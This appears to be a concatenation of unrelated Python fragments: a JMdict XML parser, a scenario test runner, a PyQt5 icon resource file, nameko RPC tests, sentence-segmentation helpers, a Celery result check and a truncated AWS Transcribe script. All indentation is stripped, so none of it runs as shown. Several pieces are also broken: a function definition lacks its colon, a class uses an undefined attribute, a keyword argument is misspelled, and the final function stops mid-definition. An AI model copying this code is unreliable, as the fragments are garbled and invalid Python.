# If there are multiple senses, subsequent senses inherit <pos> and <misc> from
# the previous sense UNLESS the sense has defined its own <pos> or <misc> tags.
if last_parts_of_speech is None or new_parts_of_speech:
parts_of_speech = new_parts_of_speech
else:
parts_of_speech = last_parts_of_speech
if last_misc is None or new_misc:
misc = new_misc
else:
misc = last_misc
senses.append(
Sense(
entry_id=entry_id,
index=sense_index,
references=[xref.text for xref in sense_node.iter("xref")],
antonyms=[ant.text for ant in sense_node.iter("ant")],
parts_of_speech=parts_of_speech,
fields=[field.text for field in sense_node.iter("field")],
misc=misc,
dialects=[dial.text for dial in sense_node.iter("dial")],
info=[s_inf.text for s_inf in sense_node.iter("s_inf")],
)
)
# Creating LSource instances from <sense><lsource>.
for lsource_node in sense_node.iter("lsource"):
lsources.append(
LSource(
entry_id=entry_id,
sense_index=sense_index,
text=lsource_node.text,
lang=lsource_node.get(XMLNS + "lang", "eng"),
type=lsource_node.get("ls_type", "full"),
wasei=lsource_node.get("ls_wasei"),
)
)
# Creating Gloss instances from <sense><gloss>.
for gloss_node in sense_node.iter("gloss"):
glosses.append(
Gloss(
entry_id=entry_id,
sense_index=sense_index,
text=gloss_node.text,
lang=gloss_node.get(XMLNS + "lang", "eng"),
gender=gloss_node.get("g_gend"),
type=gloss_node.get("g_type"),
)
)
if _has_child(sense_node, "stagk"):
related_writings = [k.text for k in sense_node.iter("stagk")]
else:
related_writings = [w.literal for w in writing_elements]
if _has_child(sense_node, "stagr"):
related_readings = [r.text for r in sense_node.iter("stagr")]
else:
related_readings = [r.literal for r in reading_elements]
for writing_literal in related_writings:
writings_senses.append(
WritingSense(
entry_id=entry_id,
writing_literal=writing_literal,
sense_index=sense_index,
)
)
for reading_literal in related_readings:
readings_senses.append(
ReadingSense(
entry_id=entry_id,
reading_literal=reading_literal,
sense_index=sense_index,
)
)
return (
entry,
{
"writing_elements": writing_elements,
"reading_elements": reading_elements,
"readings_writings": readings_writings,
"senses": senses,
"lsources": lsources,
"glosses": glosses,
"writings_senses": writings_senses,
"readings_senses": readings_senses,
},
)
def parse(filepath: Union[BinaryIO, str]) -> Generator[Tuple[Entry, dict], None, None]:
tree = etree.parse(filepath)
for node in tree.getroot().iter("entry"):
yield _parse_node(node)
|
"""Definitions and execution supports for scenario testing."""
import contextlib
import os
import pathlib
import shutil
import typing
import yaml
from reviser import definitions
from reviser.definitions import abstracts
from reviser import interactivity
from reviser.tests.scenarios.supports import mocking
from ..supports import validating
class ScenarioRunner:
"""
Execution runner for scenario testing.
This works as a ContextManager within tests to carry out the specified scenario and
return an object with results of the execution for assertion validation.
"""
def __init__(self, slug: str):
"""Create a new ScenarioRunner for the scenario defined by the slug."""
self.slug: str = slug
self.scenario = abstracts.DataWrapper(yaml.safe_load(self.path.read_text()))
self.shell: typing.Optional["interactivity.Shell"] = None
self.error: typing.Optional[Exception] = None
self.patches: typing.Optional[mocking.Patches] = None
@property
def context(self) -> typing.Optional["definitions.Context"]:
"""Get the context object created for the given scenario."""
return self.shell.context if self.shell else None
@property
def configuration(self) -> typing.Optional["definitions.Configuration"]:
"""Get the configuration object created for the given scenario."""
return self.shell.context.configuration if self.shell else None
@property
def path(self) -> pathlib.Path:
"""Get the scenario definition path."""
return pathlib.Path(__file__).parent.parent.joinpath(self.slug).absolute()
@property
def directory(self) -> pathlib.Path:
"""Get the directory in which the scenario definition resides."""
return self.path.parent.absolute()
@property
def commands(self) -> typing.List["abstracts.DataWrapper"]:
"""Get the commands loaded from the scenario to execute."""
raw = self.scenario.get_as_list(
"commands",
default=self.scenario.get_as_list("command"),
)
return [
abstracts.DataWrapper({"command": c} if isinstance(c, str) else c)
for c in raw
]
def run(self) -> "ScenarioRunner":
"""
Execute the scenario.
This will load it if it has not already been loaded via a call to the load
method.
"""
start_directory = pathlib.Path()
os.chdir(self.directory)
arguments = self.scenario.get_as_list("arguments") or []
try:
with contextlib.ExitStack() as stack:
# Create a stack object that will collect all of the
# patches needed to isolate the tests from external
# environments.
self.patches = mocking.Patches(self, stack)
# Process the shell commands specified in the scenario
# in a non-interactive fashion.
self.shell = interactivity.create_shell(arguments)
commands = [c.get("command") for c in self.commands]
self.shell.command_queue = commands
self.shell.run()
except Exception as error:
self.error = error
finally:
os.chdir(start_directory)
return self
def cleanup(self) -> "ScenarioRunner":
"""Clean up temporary data after a test."""
if self.shell is None:
return self
for t in self.shell.context.configuration.targets:
if t.bundle_directory.exists():
shutil.rmtree(t.bundle_directory)
if t.bundle_zip_path.exists():
os.remove(t.bundle_zip_path)
return self
def check_success(self):
"""Raise an error if the execution process raised an error."""
error = self.error or getattr(self.shell, "error", None)
if error is not None:
raise AssertionError("Command execution failed") from error
def check_commands(self):
"""
Iterate over scenario commands and validates the execution results.
This will be carried out against any that have defined expected result values
within the command scenario.
"""
commands = self.commands
history = self.shell.execution_history
for command, execution in zip(commands, history):
if command.has("expected"):
validating.assert_command_result(command, execution.result)
def __enter__(self) -> "ScenarioRunner":
"""Begin the context manager state by running the scenario."""
return self.run()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
"""End the context manager state and clean up execution side effects."""
self.cleanup()
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.6.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x04\x07\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x1d\x00\x00\x00\x1b\x08\x06\x00\x00\x00\x80\xca\x84\x12\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\
\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\
\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x03\x77\x49\x44\x41\x54\x48\
\x4b\xb5\x96\x4d\x48\x54\x51\x14\xc7\xff\x6f\xfc\xd6\x19\xbf\xca\
\x54\x28\xd4\xd0\x8d\x50\x29\x42\x84\x26\x6a\x9b\xa8\x4d\x82\xd4\
\xc6\x85\x66\xa0\x41\xf9\x41\xbb\x4a\x70\x5c\x25\x44\x34\x51\x0b\
\x5b\x98\x16\x04\x11\x06\x4a\xa0\x8b\x08\xb5\xa8\x45\x10\x5a\x0b\
\xa3\x0c\x9a\x12\x32\x33\xfc\x2e\xbf\xe7\x76\xce\x7d\x77\x66\xde\
\x1b\x67\x46\x93\xe6\x37\xdc\x77\xef\x39\xef\xcc\x3b\xef\xdd\x73\
\xee\xb9\x57\x13\x04\x7c\x58\x77\x4e\x60\x65\x70\x18\x1b\xce\x1f\
\x4a\xb3\x3d\xc2\x32\xd3\x10\x99\x97\x83\x08\x6a\xc1\x30\x39\x65\
\x67\xf3\xf6\x7b\xf8\x73\xbf\x5f\x69\x76\x86\x25\xc1\x8a\xd8\xea\
\x13\xb0\x36\x9d\x41\x78\x66\xba\xd2\x7a\xf1\x38\x5d\x1b\x19\xc3\
\x54\x69\x3d\x5c\x73\x8b\xf2\xc6\xff\x22\xbe\xa5\x06\xf1\xf6\x1a\
\x25\xe9\x48\xa7\xa1\x72\xe8\x26\xe2\x50\x36\x52\x06\xef\xc0\x92\
\x68\x95\xb2\x74\x3a\x99\x57\x8d\xb5\x77\x9f\xa5\x22\x54\x18\x1d\
\x5b\x38\x61\x02\x39\x0c\xcb\x48\x93\xc6\xc1\xd8\x8e\x0d\xc3\x3e\
\xa6\x4a\x2f\xca\xb1\x65\xa9\xe7\x85\x1c\xf8\x92\x78\xb3\x01\xe9\
\xce\x6e\xa4\x8e\x74\x21\x75\xb8\x53\x26\x87\x2f\x49\x9d\x57\x3c\
\x36\x29\x03\xb7\xfd\xda\x18\x61\xc7\x9c\xa8\x16\x8e\xa7\x2f\x31\
\xa7\x8a\x65\xe6\xb9\xe1\x25\x90\xe0\x68\x50\x12\x33\x83\x66\xbc\
\x82\xf5\x6c\x2f\xdc\x79\x1e\x55\x9a\x2f\x33\x76\x2b\xe6\x5b\xc9\
\x29\x30\x87\x0e\x7a\xc0\x3e\x43\xdb\xdd\xdb\x06\x4d\xab\xf3\x3c\
\x90\xf1\x4d\x7d\x4d\xf5\x3a\xfd\xa8\xd3\x34\x24\xdd\x7a\x8e\x01\
\xa5\x09\x86\x25\x2c\x73\x8f\x1a\x06\x87\x63\x6f\x64\x43\xf5\x66\
\xbc\xc5\xc4\x89\xf7\xf2\x03\xca\xb1\xac\x34\x5e\x2c\x89\x8e\x2a\
\x44\xa4\xf0\xd0\x06\xbb\xed\x38\xe6\x5a\x3a\xc0\x4b\x57\x88\xbb\
\x70\x4f\xd6\xa2\xe3\xb1\x9c\x16\x23\x2e\x79\x7d\x43\x55\x6b\x02\
\xae\xd9\x62\x5c\xa7\xff\x8d\x23\x12\x65\x52\xbf\x05\x42\x8c\x09\
\x47\x21\xa8\x40\x14\x0a\xc7\x18\x2f\x20\x9d\xd5\xe1\x4f\xe2\x7b\
\x46\x85\x18\x47\x11\xb5\x5c\x51\x49\xa6\x6c\x4e\x2f\x47\xe3\x2c\
\x25\xa7\x89\x07\xa6\xfb\x2c\x17\x08\xbb\xc7\xd6\xdb\x2a\xa5\x9d\
\xde\x28\xa6\x6e\x5e\xa3\x29\x47\xa3\x58\xea\xad\xf0\x58\x3d\x36\
\xbe\xf2\x74\x2d\x53\xcc\x47\xf1\x50\x37\x22\x16\x68\xfc\x45\xc9\
\xe1\x88\xaa\xa2\x72\xd7\x78\xd4\x27\xc6\xc1\x31\x38\x35\x23\x66\
\x7e\xa9\xd1\x34\x9e\xca\x3e\x0d\xf4\x55\x34\x85\xdc\xb2\x50\x20\
\x75\xa5\xb0\x75\x5d\x45\xa2\xa3\x1c\x31\x52\x8e\xa7\x16\x8d\x73\
\x64\xf3\x92\xc2\xc5\x14\xd0\x8f\xff\xd3\x26\x25\x1d\x83\xd3\x42\
\xd0\xf4\xaa\x78\x0a\xf4\x97\x1c\x51\xfa\x25\xbc\x95\x7d\xb2\x21\
\x5e\x31\x38\x20\xfb\x58\x79\x65\xf4\x2f\xdd\x2f\xaf\x5b\x21\x9d\
\x8a\x35\xbe\x2e\x62\xe3\x83\x77\xcd\xee\xea\x69\x43\x2c\x4d\x5d\
\xd4\xe1\x6c\xf5\x55\xd3\x9e\xe5\xe0\xa4\x17\x19\x55\x63\x33\x71\
\xaa\xdf\x82\xd5\xe1\x67\xc2\x1e\xbe\x39\xf0\xde\xc4\x1a\x13\x37\
\x0e\xfa\xbb\xcf\xad\x56\xf4\xb1\x09\x5d\x6b\xa5\x5c\xa1\x12\xab\
\x48\xd0\xf4\x9a\x6c\x4d\x89\x34\xdf\xd2\x4d\x1b\x29\xa9\x03\x92\
\x8d\x4b\x4f\xfa\x50\xe3\x29\xaf\x36\x54\x22\x17\xd7\xf6\x2a\x31\
\x00\x99\xb4\x4a\x29\xa3\x15\x36\x18\xb7\x75\xed\x67\xc9\x05\xb1\
\x32\x34\xa2\x44\x1d\x7f\x7b\x20\x17\x87\xa9\xb2\x7a\x25\x6d\xcf\
\x26\x10\x7e\xb3\xd7\xdf\x26\xe0\x5b\x91\xfc\xd5\xec\x40\x9b\x87\
\x11\xde\x14\xc2\x9a\xab\xcf\xdb\x57\x86\xcc\x0f\x74\x4d\x4e\xcb\
\xa3\x8b\x7e\xd6\xd1\xf0\xbb\xbd\x07\x73\x97\xdb\xf5\x9b\x8a\xf5\
\x8f\xdf\x64\xcf\x36\x62\x79\x55\xda\xcc\xb7\x76\x4a\x5d\x30\x92\
\x1f\xb5\x42\xe3\xca\x33\x99\x7f\x56\xa9\x42\x0b\xaf\x86\x64\x5a\
\xd7\x16\x7e\x53\xde\xca\x42\x8d\xdb\x21\x23\x8f\x2b\xae\xd9\x45\
\xb9\xab\x87\xea\xc8\x62\x6d\x3c\x4d\x55\xab\x51\x49\xca\x29\x0f\
\x42\xe1\x98\x8f\x32\xec\x2c\xa6\xdc\x3c\x93\x1e\xa7\x6e\x78\x1b\
\x5b\xa0\xa6\x17\xfb\x7f\x87\xb3\x93\x4f\x11\xd1\xe4\x28\xae\xfa\
\xa4\xd2\x9a\xd9\xe4\xd4\x0d\x67\xef\x4e\x4e\xf8\xfe\x0e\xd7\x66\
\x80\xbf\x48\x3f\xa7\x8a\x10\x85\x4b\x59\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x04\x1f\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x1d\x00\x00\x00\x1b\x08\x06\x00\x00\x00\x80\xca\x84\x12\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\
\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\
\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x03\x8f\x49\x44\x41\x54\x48\
\x4b\xb5\x96\x5d\x6c\x4c\x51\x10\xc7\xff\xf7\x56\x55\xe9\x56\x5b\
\x4a\x25\x42\x35\x25\xd2\xf8\x6e\x48\x2d\x1b\x8d\x48\x84\x88\x2d\
\x12\x0f\x1a\x55\x5e\x44\x28\x52\x89\x17\xc2\xc6\x0b\x89\x44\x96\
\x78\xf1\x80\xaa\x78\x11\x5f\x1b\xa2\x4f\xc4\xf7\x47\xa5\x8a\x48\
\x89\x26\xb5\x48\xb4\xbe\x5a\xad\xc6\x77\x7b\xcc\x9c\x3b\xbb\x7b\
\xf7\xda\x5d\x25\xf6\xb7\x39\xf7\x9c\x99\x3b\xbb\xb3\xe7\x9c\x99\
\x39\xc7\x50\x04\x1c\xfc\x0c\xb6\xe2\xdb\x95\x46\xf4\x04\xdb\x44\
\xd3\x37\x52\xf2\xf3\xd0\x7f\xca\x58\xa4\x52\x4b\x44\x94\x53\x76\
\xd6\xe5\x3b\x82\xe9\x4b\xef\x88\xe6\xdf\xb8\x5e\xf1\x03\x03\x2b\
\x17\x20\x63\xf3\x72\xf4\xcb\x1f\x21\xda\x08\x61\xa7\x3f\x1e\x34\
\xe3\x5d\x69\x15\x3c\xb5\xa9\xfa\xc5\xff\xa2\xf1\xfe\x12\x64\xfa\
\xd6\x88\x64\x61\xf2\x23\x59\x0e\x99\xa9\xd3\xce\xe2\xcd\x94\x4a\
\xf4\x7e\xec\x16\x8d\xcc\x94\x95\xee\x5d\x1f\x44\x95\x1c\x6e\xed\
\x18\x82\xdc\x2b\x07\x61\x66\x65\xc0\xe4\x80\x89\xe7\xf0\xc6\xc6\
\x34\x6d\x9c\x88\xbe\xd8\x30\xec\xe3\x5d\xe9\x06\x3d\x36\xbf\x9c\
\xbb\xa6\x07\x4e\x1e\xb6\xac\xc4\x88\xe0\x29\x0c\x7f\x50\x83\xa7\
\xa3\xf6\xe9\xe0\x70\xf2\xa8\x7d\x5d\xd8\xa6\x29\x73\x57\x4c\x1b\
\x3b\xec\x98\x03\xd5\xe4\xfd\x74\x52\x7f\x64\x82\x8e\xbc\x10\x9c\
\x02\x83\xfd\x1b\x45\x02\xae\x7a\x5b\xe0\xf1\x5e\x40\xc6\xea\x00\
\xea\x44\x97\x56\x3a\x55\x47\xec\x9f\xe0\x3d\xa6\x40\xea\x44\x05\
\xfd\x40\x8b\xad\x0d\x0d\xec\x81\x61\xac\x0d\xff\x20\xe3\x0c\x7d\
\x43\x7a\x8b\x3a\xac\x35\x0c\x64\xef\xbf\x04\x9f\xb7\x43\x74\xf1\
\x31\x53\xf2\x87\xc9\x30\x31\xbc\xf7\x76\x7a\xa4\x8f\x26\x52\x4c\
\x8e\x79\xaf\xea\x09\x64\x7b\x5b\x45\x13\xc1\xcc\xf2\xaf\x42\x6a\
\x2e\x0f\x5d\xf0\xb9\xe6\xa3\x73\xe7\x61\x70\xea\x2a\x75\x08\xa1\
\xc5\xea\xf6\x9f\xd4\xcb\x62\xa7\x57\x3f\xeb\xa9\x6a\xb5\x52\x3a\
\x78\xb0\x97\xbe\x57\x10\x18\x0e\x5f\x20\x5b\xbf\x49\x88\x52\xcd\
\xca\xef\x06\x15\x08\xb7\xf2\x37\x73\x02\x59\x7c\x6f\x7c\xa6\x5e\
\x8f\x5e\xa6\x5e\x61\x16\xb5\x22\x55\x4e\xa6\x6c\x4e\x7f\x8e\xc6\
\x63\x44\xce\x53\xb5\x51\xef\x59\x2e\x56\xbe\xb0\x6d\xa4\x95\x93\
\x5d\x41\x60\x91\x6e\xba\x38\x58\xdc\xc2\xe6\xb1\x06\xed\xa5\xd5\
\xdc\x73\xab\x30\xfb\xc0\x37\xd2\x7f\xc5\x61\x34\xe1\x84\x65\x44\
\x7c\xa2\xf1\x73\x91\xfb\x21\x6d\x15\x95\xbb\x4d\xb3\x1d\x7b\x9c\
\x18\x9b\xd3\x68\x54\xc7\x7b\x19\xb5\xe3\xbc\xee\xf3\x40\xb3\xa2\
\x25\x5c\x84\x57\x18\x83\x62\xad\x2b\x85\xab\x66\x1b\xb2\xfc\x65\
\x48\xd7\x72\x26\xb5\x01\xa8\x25\x1b\xb6\x63\x8a\xe9\xc3\xe3\xdb\
\xb6\x65\xb7\x39\x75\x83\x96\x57\xf6\x53\xa1\x6e\x4e\x89\xe8\xbf\
\xa0\x41\xf7\x39\xb6\xfd\x4a\xc7\x44\xdd\x0f\xd4\x4f\xc6\x9a\x69\
\x81\x7e\xfe\x09\xed\x54\xe9\x9c\xee\x46\xcf\x93\x48\xce\x0e\x39\
\xb7\x07\xf7\xce\x94\x20\x6d\x46\xa1\xcc\xaa\x3d\x9c\x0e\x41\xfa\
\x23\x4d\x7a\xe4\x64\x90\xf4\x89\xa1\xe2\x10\x44\xa7\xce\x86\x47\
\xd8\xb2\x78\x5c\x78\x4f\x53\xb2\xe7\xe3\xf8\xf6\x6d\xc8\xbd\x7b\
\x14\x2b\x26\xf1\xfb\x36\x54\xe0\xa6\x4e\x03\x0f\xed\x69\x3d\xab\
\xfa\x40\x03\x7d\xf8\x3b\x33\x6d\xf9\x6b\x76\xed\x3c\x45\x07\xa9\
\x48\x31\x29\x44\xf5\xe9\x8b\x58\x53\x28\x22\xa5\x56\x39\x8a\xb0\
\x7b\xa4\x88\x71\xe0\xaa\x45\x11\x2d\xb8\x60\x3f\xd6\x8d\xb7\x73\
\xd6\xab\x92\xea\x17\x22\x5a\xc4\x3a\x03\xb9\x38\x14\x75\xed\x10\
\xa9\x6f\x36\xf1\x88\x19\xbd\xb1\x0e\x01\x67\x45\x8a\x55\xb3\xe3\
\x1d\x1e\x76\xf8\x50\x30\xa8\x02\x29\x67\xb5\x61\x38\x88\x78\x26\
\x66\x96\x0b\x9f\x6b\x2e\x62\x72\xc1\x71\x79\x13\x81\x67\x1b\x3a\
\x18\xe2\xd9\x38\x79\xdc\xbb\x15\x06\x57\x9e\xf1\x2f\xab\x45\x95\
\x5c\x78\x22\x39\x94\xd7\x26\x1f\x5b\x7c\x94\x25\x9b\x90\x43\x46\
\x5f\x57\xf8\xfe\xc2\xa7\x7a\xb2\xae\x2c\x0d\x97\xe7\x51\xd5\xda\
\x24\x92\x38\xe5\x41\x32\x1c\xf3\x55\x86\x9d\xa5\x97\x79\x44\x63\
\x11\x75\xef\x65\xf8\x18\xfb\x44\xcd\x2a\xf6\x7f\x0f\x47\x27\xdf\
\x22\x06\x90\xa3\x41\x95\x0b\x45\x1b\xcd\x6f\x4e\x43\xf0\xc5\xfb\
\x5f\x6e\xf8\xb1\x2e\xd7\xd1\x00\xbf\x00\x6c\x66\x9a\x10\xcc\xeb\
\xeb\xb8\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x15\
\x02\x94\x3a\xde\
\x00\x45\
\x00\x64\x00\x69\x00\x74\x00\x33\x00\x44\x00\x69\x00\x53\x00\x63\x00\x68\x00\x65\x00\x6d\x00\x61\x00\x74\x00\x69\x00\x73\x00\x61\
\x00\x74\x00\x69\x00\x6f\x00\x6e\
\x00\x0d\
\x01\x40\x1d\x27\
\x00\x65\
\x00\x64\x00\x69\x00\x74\x00\x5f\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x11\
\x00\xed\x45\x27\
\x00\x73\
\x00\x74\x00\x6f\x00\x70\x00\x65\x00\x64\x00\x69\x00\x74\x00\x5f\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x64\x00\x00\x00\x00\x00\x01\x00\x00\x04\x0b\
\x00\x00\x00\x44\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
def qInitResources():
QtCore.qRegisterResourceData(
0x01, qt_resource_struct, qt_resource_name, qt_resource_data
)
def qCleanupResources():
QtCore.qUnregisterResourceData(
0x01, qt_resource_struct, qt_resource_name, qt_resource_data
)
qInitResources()
|
def step_up1()
"Straightforward implementation: keep track of how many level we
need to ascend, and stop when this count is zero."
deficit = 1
while deficit > 0:
if step():
deficit -= 1
else:
deficit += 1
|
"""Python bindings to the libopus, IETF low-delay audio codec"""
|
import pytest
from mock import ANY, Mock
from nameko.rpc import Responder
# python version compat
EXCEPTION_MODULE = Exception.__module__
@pytest.yield_fixture
def unserializable():
def unserializable_inner():
pass # pragma: no cover
yield unserializable_inner
@pytest.fixture
def message():
message = Mock()
message.properties = {'reply_to': '', 'content_type': 'application/json'}
return message
def test_responder(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
# serialisable result
result, exc_info = responder.send_response(True, None)
assert result is True
assert exc_info is None
expected_msg = {
'result': True,
'error': None
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
def test_responder_worker_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
# serialisable exception
worker_exc = Exception('error')
result, exc_info = responder.send_response(
None, (Exception, worker_exc, "tb"))
assert result is None
assert exc_info == (Exception, worker_exc, "tb")
expected_msg = {
'result': None,
'error': {
'exc_path': '{}.Exception'.format(EXCEPTION_MODULE),
'value': 'error',
'exc_type': 'Exception',
'exc_args': ['error']
}
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
@pytest.mark.parametrize("serializer,content_type,exception_info_string", [
('json', 'application/json', "is not JSON serializable"),
('pickle', 'application/x-python-serialize', "Can't pickle")])
def test_responder_unserializable_result(
message, mock_producer, unserializable,
serializer, content_type, exception_info_string):
message.properties['content_type'] = content_type
exchange = Mock()
responder = Responder('amqp://localhost', exchange, serializer, message)
# unserialisable result
worker_result = unserializable
result, exc_info = responder.send_response(worker_result, None)
# responder will return the error from the serializer
assert result is None
# Different kombu versions return different exceptions, so
# testing for the concrete exception is not feasible
assert exc_info == (ANY, ANY, ANY)
assert exception_info_string in str(exc_info[1])
# and publish a dictionary-serialized UnserializableValueError
# on worker_result
expected_msg = {
'result': None,
'error': {
'exc_path': 'nameko.exceptions.UnserializableValueError',
'value': 'Unserializable value: `{}`'.format(worker_result),
'exc_type': 'UnserializableValueError',
'exc_args': [],
}
}
(msg,), _ = mock_producer.publish.call_args
assert msg == expected_msg
def test_responder_cannot_unicode_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
class CannotUnicode(object):
def __str__(self):
raise Exception('error')
# un-unicode-able exception
worker_exc = Exception(CannotUnicode())
# send_response should not throw
responder.send_response(True, (Exception, worker_exc, "tb"))
def test_responder_cannot_repr_exc(message, mock_producer):
exchange = Mock()
responder = Responder('amqp://localhost', exchange, 'json', message)
class CannotRepr(object):
def __repr__(self):
raise Exception('error')
# un-repr-able exception
worker_exc = Exception(CannotRepr())
# send_response should not throw
responder.send_response(True, (Exception, worker_exc, "tb"))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Sentence and token/word segmentation utilities like Tokenizer"""
from __future__ import division, print_function, absolute_import # , unicode_literals
from future import standard_library
standard_library.install_aliases() # noqa
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open,
pow, round, super, filter, map, zip)
from past.builtins import basestring
import os
import re
from itertools import chain
import logging
from .detector_morse import Detector
from .detector_morse import slurp
from .futil import find_files
from .constants import DATA_PATH
from .futil import generate_files
from .segmentation import * # noqa
# from .penn_treebank_tokenizer import word_tokenize
logger = logging.getLogger(__name__)
try:
from nlup import BinaryAveragedPerceptron
except ImportError:
logger.error("detector_morse disabled because Kyle Gorman's nlup sentence boundary detector has not been installed.")
class BinaryAveragedPerceptron:
pass
# TODO: break this up
def generate_sentences(text='', train_path=None, case_sensitive=True, ext=['.md', '.txt', '.asc', '.asciidoc'],
normalize_ordinals=1, normalize_newlines=1, normalize_sentence_boundaries=1,
epochs=20, classifier=BinaryAveragedPerceptron,
re_eol=r'\r\n|\r|\n', **kwargs):
"""Generate sentences from a sequence of characters (text)
Wrapped text (newlines at column 80, for instance) will break this, breaking up sentences.
Wrapper and preprocessor for Kyle Gorman's "DetectorMorse" module
Arguments:
preprocess (bool): whether to assume common sentence delimitters in markdown and asciidoc formatting
using r'[.?!][ \t]*\n\n|[.?!][ \t]*\r\n\r\n|[.?!][ \t]*\r\r|[.?!][ ][ ][A-Z]'
case_sensitive (int): whether to consider case to make decisions about sentence boundaries
epochs (int): number of epochs (iterations for classifier training)
"""
ext = [ext] if isinstance(ext, basestring) else ext
if isinstance(text, basestring) and len(text) <= 256:
if os.path.isfile(text) and os.path.splitext(text)[-1].lower() in ext:
text = open(text)
elif os.path.isdir(text):
return chain.from_iterable((
generate_sentences(text=stat['path'], train_path=train_path, ext=ext,
normalize_ordinals=normalize_ordinals, normalize_newlines=normalize_ordinals,
normalize_sentence_boundaries=normalize_sentence_boundaries,
epochs=epochs, classifier=classifier, re_eol=re_eol, **kwargs)
for stat in find_files(text, ext=ext)))
if isinstance(text, basestring):
texts = Split(text=text, re_delim=re_eol)
else:
texts = chain.from_iterable(Split(text=doc, re_delm=re_eol) for doc in text)
if normalize_newlines:
re_eol = re.compile(r'\r\n|\r')
texts = (re_eol.sub(r'\n', doc) for doc in texts)
if normalize_ordinals:
re_ord = re.compile(r'\b([0-9]+|[A-Za-z])[.?!][ \t]{1,4}([A-Za-z])')
texts = (re_ord.sub(r'\1) \2', doc) for doc in texts)
if normalize_sentence_boundaries:
re_eos = re.compile(r'([.?!])([ ][ ])[\n]?([A-Z])')
texts = (re_eos.sub(r'\1\n\3', doc) for doc in texts)
if train_path:
generate_sentences.detector = Detector(slurp(train_path), epochs=epochs, nocase=not case_sensitive)
elif not isinstance(getattr(generate_sentences, 'detector', None), Detector):
generate_sentences.detector = Detector.load(
os.path.join(DATA_PATH, 'wsj_pugnlp.detector_morse.Detector.json.gz'))
# generate_sentences.detector = SentenceDetector(text=text, nocase=not case_sensitive,
# epochs=epochs, classifier=classifier)
return iter(chain.from_iterable((s.lstrip() for s in generate_sentences.detector.segments(text)) for text in texts))
class PassageIter(object):
"""Passage (document, sentence, line, phrase) generator for files at indicated path
Walks all the text files it finds in the indicated path,
segmenting sentences and yielding them one at a time
References:
Radim's [word2vec tutorial](http://radimrehurek.com/2014/02/word2vec-tutorial/)
"""
def __init__(self, path='', ext='', level=None, dirs=False, files=True,
sentence_segmenter=generate_sentences, word_segmenter=str.split, verbosity=0):
self.file_generator = generate_files(path=path, ext='', level=None, dirs=False, files=True, verbosity=0)
def __iter__(self):
for fname in os.listdir(self.file_generator):
for line in open(os.path.join(self.dirname, fname)):
yield line.split()
|
#!/usr/bin/env python
#coding:utf-8
#__time__: 2020/6/18 22:39
#__author__ = 'ren_mcc'
import sys
import os
project_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0,project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
import django
django.setup()
from celery import states
from celery.result import AsyncResult
from celery.utils import get_full_cls_name
from celery.utils.encoding import safe_repr
result = AsyncResult('e27afabf-06c2-4131-98bf-ffcf12720597')
print(result.state, result.result) |
import boto3
import requests
from requests import get
from pprint import pprint
import json
import time
client=boto3.client('transcribe')
def start_transcribe(job_name, file):
''' Starts AWS Transcribe job with a given mp3 file in S3 bucket. '''
response = client.start_transcription_job(
TranscriptionJobName=job_name,
LanguageCode='en-US',
MediaFormat='mp3',
Media={
'MediaFileUri': file
}
)
def get_job_status(job_name):
''' Gets job status from AWS Transcribe.'''
response = client.get_transcription_job(
TranscriptionJobName=job_name
)
return response['TranscriptionJob']['TranscriptionJobStatus']
def get_response(job_name, filetobedownloaded):
